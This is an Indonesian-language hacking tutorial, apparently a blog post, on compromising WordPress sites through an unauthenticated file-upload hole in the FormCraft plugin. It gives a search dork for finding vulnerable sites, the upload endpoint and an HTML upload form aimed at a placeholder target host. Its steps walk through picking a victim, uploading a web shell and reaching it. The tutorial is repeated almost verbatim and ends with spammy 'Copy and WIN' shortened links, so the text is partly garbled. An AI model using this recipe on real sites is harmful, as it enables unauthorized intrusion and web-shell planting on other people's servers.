Assalamualikum Marhaban Ya Ramadhan
Gak terasa udah memasuki bulan puasa Ramadhan
Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D
Spoiler : https://www.youtube.com/watch?v=Z21Lteweotk
Bahan Nyangkul :
1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/
2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. CSRF
<form method="POST"
action="http://NDAS.mu/wp-content/plugins/formcraft/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Hajar...!!!</button>
</form>
4. Handsome B-)
Mulai semedi :
1. Pertama supaya semedi anda barokah wal afiat, dorking dulu lah :D Whatever, pake bing atau
google :)
2. Pilih target web nya untuk bahan semedi. Dan ini adalah korban semedi saya
3. Masukan exploit nya di belakang URL Target semedi sampeyan ;) Dan jika Vuln maka akan ada
penampakan error seperti gambar dibawah
4. Go to your CSRF, men . Lalu edit lah seperti ini, dan klik SAVE
5. Buka CSRF nya (Klik 2x pada CSRF) atau bisa juga diseret kayak gini, tong
6. Upload your FUCKIN Shell, dude
7. Jika Shell berhasil di unggah, maka penampakan nya seperti gambar dibawah
8. Lalu, akses Shell anda dengan menambahkan exploit /files/FUCK.php
9. Jika semedi sampeyan varokah, maka penampakan nya akan unyu seperti ini :p
Sekian tutorial unyu dari _MisterNotFound_
Gunakan lah ilmu hitam ini untuk kebaikan, ojo di salahgunakan :p
Oke, semoga varokah
Terima kasih, Wassalamualikum Wr. Wb.
Gak terasa udah memasuki bulan puasa Ramadhan
Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D
Spoiler : https://www.youtube.com/watch?v=Z21Lteweotk
Bahan Nyangkul :
1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/
2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. CSRF
<form method="POST"
action="http://NDAS.mu/wp-content/plugins/formcraft/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Hajar...!!!</button>
</form>
4. Handsome B-)
Mulai semedi :
1. Pertama supaya semedi anda barokah wal afiat, dorking dulu lah :D Whatever, pake bing atau
google :)
2. Pilih target web nya untuk bahan semedi. Dan ini adalah korban semedi saya
3. Masukan exploit nya di belakang URL Target semedi sampeyan ;) Dan jika Vuln maka akan ada
penampakan error seperti gambar dibawah
4. Go to your CSRF, men . Lalu edit lah seperti ini, dan klik SAVE
5. Buka CSRF nya (Klik 2x pada CSRF) atau bisa juga diseret kayak gini, tong
6. Upload your FUCKIN Shell, dude
7. Jika Shell berhasil di unggah, maka penampakan nya seperti gambar dibawah
8. Lalu, akses Shell anda dengan menambahkan exploit /files/FUCK.php
9. Jika semedi sampeyan varokah, maka penampakan nya akan unyu seperti ini :p
Sekian tutorial unyu dari _MisterNotFound_
Gunakan lah ilmu hitam ini untuk kebaikan, ojo di salahgunakan :p
Oke, semoga varokah
Terima kasih, Wassalamualikum Wr. Wb.
Assalamualikum
Marhaban Ya Ramadhan
Gak terasa udah memasuki bulan puasa Ramadhan
Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D
Copy and WIN : http://ow.ly/KNICZ
Copy and WIN : http://ow.ly/KNICZ